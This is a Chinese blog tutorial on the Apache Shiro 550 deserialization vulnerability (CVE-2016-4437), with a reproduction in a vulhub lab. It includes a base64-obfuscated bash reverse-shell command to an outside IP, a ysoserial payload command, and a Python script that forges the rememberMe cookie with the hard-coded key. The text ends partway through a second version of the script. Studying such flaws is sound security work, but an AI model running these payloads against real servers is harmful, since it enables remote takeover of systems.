<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="朝闻道 夕死可矣" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="朝闻道 夕死可矣" type="application/atom+xml"><link rel="alternate" type="application/json" title="朝闻道 夕死可矣" href="https://lib0gus.github.io/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&display=swap&subset=latin,latin-ext" media="none" onload="this.media&#x3D;&#39;all&#39;"><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="modulepreload" href="/js/nyx-player-X6RTDFRC.js"></link><link rel="modulepreload" href="/js/copy-tex-IZMHKWEC.js"></link><link rel="modulepreload" href="/js/post-HWEJVK45.js"></link><link rel="modulepreload" href="/js/chunk-OAGLLRHQ.js"></link><link rel="modulepreload" href="/js/index.esm-4WN36CR4.js"></link><link rel="modulepreload" href="/js/chunk-RK7HQRIO.js"></link><link rel="modulepreload" href="/js/chunk-MUPCZ7YY.js"></link><link rel="stylesheet" href="/css/siteInit.css" media="none" onload="this.media&#x3D;&#39;all&#39;"></link><link rel="preload" href="../images/1.png" as="image" fetchpriority="high"><meta name="keywords" content="Java安全"/><meta name="description" content="记录学习日常，请犀利点评，指出我的错误"/><link rel="canonical" href="https://lib0gus.github.io/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/"><link rel="stylesheet" href="/css/post.css?v=0.5.4"><link rel="stylesheet" href="/css/mermaid.css?v=0.5.4"><!-- 临时处理--><link rel="stylesheet" media="none" onload="this.media='all'" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css"><title>Java安全之Shiro</title><meta name="generator" content="Hexo 8.1.1"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="pagefind_mount"></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Java安全之Shiro</h1><div class="meta"><span class="item" title="创建时间：2026-03-30 20:35:03"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2026-03-30T20:35:03+08:00">2026-03-30</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>7k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>6 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">Lib0gus的博客</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><img src="../images/1.png" loading="eager" decoding="async" fetchpriority="high" alt="朝闻道 夕死可矣"></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/Java%E5%AE%89%E5%85%A8/" itemprop="item" rel="index" title="分类于Java安全"><span itemprop="name">Java安全<meta itemprop="position" content="0"/></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" data-pagefind-body="data-pagefind-body" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://lib0gus.github.io/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/test.png"/><meta itemprop="name" content="Lib0gus的小屋"/><meta itemprop="description" content="技术分享 &amp; 生活记录, 记录学习日常，请犀利点评，指出我的错误"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="朝闻道 夕死可矣"/></span><div class="body md" itemprop="articleBody"><h1 id="shiro是什么"><a class="anchor" href="#shiro是什么">#</a> Shiro是什么</h1>
<p>Shiro是一个Java安全框架，能进行身份认证、授权管控、会话管理，还有加密功能保障数据安全。</p>
<p>身份认证核心：Shiro作为Java安全框架，身份认证是核心功能，支持多种认证方式，用户登录时验证凭证，通过才可进入系统防非法访问。</p>
<h1 id="shiro-550-反序列化漏洞原理"><a class="anchor" href="#shiro-550-反序列化漏洞原理">#</a> Shiro 550 反序列化漏洞原理</h1>
<p>CVE-2016-4437</p>
<p>影响范围Apache shiro&lt;=1.2.4</p>
<h2 id="原理"><a class="anchor" href="#原理">#</a> 原理</h2>
<p>在Apache shiro的框架中，执行身份验证时提供了一个记住密码的功能（RememberMe），如果用户登录时勾选了这个选项。用户的请求数据包中将会在cookie字段多出一段数据，这一段数据包含了用户的身份信息，且是经过加密的。加密的过程是：用户信息=&gt;序列化=&gt;AES加密（这一步需要用密钥key）=&gt;base64编码=&gt;添加到RememberMe Cookie字段。勾选记住密码之后，下次登录时，服务端会根据客户端请求包中的cookie值进行身份验证，无需登录即可访问。那么显然，服务端进行对cookie进行验证的步骤就是：取出请求包中rememberMe的cookie值 =&gt; Base64解码=&gt;AES解密（用到密钥key）=&gt;反序列化。</p>
<p><img loading="lazy" src="1775045461594.png" alt="1775045461594" /></p>
<p>那么问题出现在哪里，即在AES_<strong>&lt;font style=&quot;color:#DF2A3F;&quot;&gt;加密时所需要的key通常来说是要保密的，&lt;/font&gt;</strong><em>&lt;font style=&quot;color:#000000;&quot;&gt;但是在&lt;/font&gt;</em><strong>&lt;font style=&quot;color:#DF2A3F;&quot;&gt;shiro版本&lt;=1.2.24的版本中使用了固定的密钥kPH+bIxk5D2deZiIxcaaaA==&lt;/font&gt;</strong>_。这样攻击者直接就可以用这个密钥实现上述加密过程，在Cookie字段写入想要服务端执行的恶意代码，最后服务端在对cookie进行解密的时候（反序列化后）就会执行恶意代码。在后续的版本中，这个密钥也可能会被爆破出来，从而被攻击者利用构造payload。</p>
<h2 id="漏洞复现"><a class="anchor" href="#漏洞复现">#</a> 漏洞复现</h2>
<p>环境搭建：使用 vulhub 搭建</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#998418;--shiki-dark:#B8A965">cd</span><span style="color:#B56959;--shiki-dark:#C98A7D"> ../vulhub/shiro/CVE-2016-4437</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#80A665">docker-compose</span><span style="color:#B56959;--shiki-dark:#C98A7D"> up</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -d</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#80A665">docker</span><span style="color:#B56959;--shiki-dark:#C98A7D"> ps</span></span></code></pre>
<p><img loading="lazy" src="1775045493734.png" alt="1775045493734" /></p>
<p>我们可以看到，端口为8080访问即可看到</p>
<p><img loading="lazy" src="1775045502316.png" alt="1775045502316" /></p>
<p>我们使用Burpsuit进行抓包查看一下</p>
<p><img loading="lazy" src="1775045527236.png" alt="1775045527236" /></p>
<p>我们可以看到，返回包里有rememberMe=deleteMe，这就是shiro的标志。执行身份验证时提供了一个记住密码的功能（RememberMe），如果用户登录时勾选了这个选项。用户的请求数据包中将会在cookie字段多出一段数据</p>
<p>此时我们来构造cookie进行反序列化攻击。其实也有很多成熟的工具可以使用，但是我们还是先来手动复现一下加深理解。</p>
<h2 id="攻击流程为"><a class="anchor" href="#攻击流程为">#</a> 攻击流程为</h2>
<p>1、探测与识别</p>
<p>2、构造恶意 Payload</p>
<p>3、加密并伪造 Cookie</p>
<p>4、发送恶意请求</p>
<p>1、探测与识别</p>
<p>上述其实已经简单说过这个了，攻击者首先会向目标网站发送请求，通过检查 HTTP 响应头中的 <code>Set-Cookie</code> 字段来识别是否存在 Shiro 框架。如果响应中包含 <code>rememberMe=deleteMe</code>，则表明目标很可能使用了 Shiro。</p>
<p>2、构造恶意的payload</p>
<p>我们来使用反弹shell进行演示，由于反弹shell的命令里有&lt;&gt;|等符号，所以我们先使用base64编码，可以有效绕过对其的检测。</p>
<p><a target="_blank" rel="noopener" href="https://ares-x.com/tools/runtime-exec">https://ares-x.com/tools/runtime-exec</a></p>
<p><img loading="lazy" src="1775045543608.png" alt="1775045543608" /></p>
<p>结果为</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-latex"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">bash -c </span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMjI4LjYzLjIyMy85OTk4IDA+JjE=</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">|</span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">base64,-d</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">|</span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">bash,-i</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span></code></pre>
<p>随后我们使用ysoserial.jar工具来生成序列化的Payload</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-latex"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections5 "bash -c </span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMjI4LjYzLjIyMy85OTk4IDA+JjE=</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">|</span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">base64,-d</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">|</span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">bash,-i</span><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">"</span></span></code></pre>
<p><img loading="lazy" src="1775045561183.png" alt="1775045561183" /></p>
<p>3、加密并伪造cookie</p>
<p>过程为AES加密=&gt;Base64编码</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-python"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sys</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> uuid</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> subprocess</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">from</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> Crypto</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Cipher </span><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">def</span><span style="color:#59873A;--shiki-dark:#80A665"> encode_rememberme</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">command</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    popen </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> subprocess</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Popen</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">java</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">-jar</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">ysoserial.jar</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">JRMPClient</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> command</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> stdout</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">subprocess</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#A65E2B;--shiki-dark:#C99076">PIPE</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">    BS</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">block_size</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    pad </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#AB5959;--shiki-dark:#CB7676"> lambda</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> s</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> s </span><span style="color:#AB5959;--shiki-dark:#CB7676">+</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#A65E2B;--shiki-dark:#C99076">BS</span><span style="color:#AB5959;--shiki-dark:#CB7676"> -</span><span style="color:#998418;--shiki-dark:#B8A965"> len</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">s</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#AB5959;--shiki-dark:#CB7676"> %</span><span style="color:#A65E2B;--shiki-dark:#C99076"> BS</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#AB5959;--shiki-dark:#CB7676"> *</span><span style="color:#998418;--shiki-dark:#B8A965"> chr</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#A65E2B;--shiki-dark:#C99076">BS</span><span style="color:#AB5959;--shiki-dark:#CB7676"> -</span><span style="color:#998418;--shiki-dark:#B8A965"> len</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">s</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#AB5959;--shiki-dark:#CB7676"> %</span><span style="color:#A65E2B;--shiki-dark:#C99076"> BS</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">encode</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    key </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">b64decode</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">kPH+bIxk5D2deZiIxcaaaA==</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    iv </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> uuid</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">uuid4</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">bytes</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    encryptor </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">new</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">key</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#A65E2B;--shiki-dark:#C99076">MODE_CBC</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> iv</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    file_body </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> pad</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">popen</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">stdout</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">read</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    base64_ciphertext </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">b64encode</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">iv </span><span style="color:#AB5959;--shiki-dark:#CB7676">+</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> encryptor</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">encrypt</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">file_body</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">    return</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64_ciphertext</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">if</span><span style="color:#998418;--shiki-dark:#B8A965"> __name__</span><span style="color:#AB5959;--shiki-dark:#CB7676"> ==</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">__main__</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    payload </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> encode_rememberme</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">sys</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">argv</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#2F798A;--shiki-dark:#4C9A91">1</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">   </span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">print</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> "</span><span style="color:#B56959;--shiki-dark:#C98A7D">rememberMe=</span><span style="color:#A65E2B;--shiki-dark:#C99076">{0}</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">format</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">payload</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">decode</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span></code></pre>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-python"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sys</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> uuid</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> subprocess</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">from</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> Crypto</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Cipher </span><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">def</span><span style="color:#59873A;--shiki-dark:#80A665"> encode_rememberme</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">command</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 1. 调用 ysoserial 生成 payload</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 注意：这里使用的是 JRMPClient，实战中通常使用 CommonsBeanutils1</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    popen </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> subprocess</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Popen</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">java</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">-jar</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">ysoserial.jar</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">JRMPClient</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> command</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> stdout</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">subprocess</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#A65E2B;--shiki-dark:#C99076">PIPE</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 2. 定义填充函数 (PKCS5Padding)</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # Python 3 中需要注意 bytes 和 str 的区别</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">    BS</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">block_size</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 修改点：使用 bytes([val]) 替代 chr(val) 以确保结果是 bytes 类型</span></span>
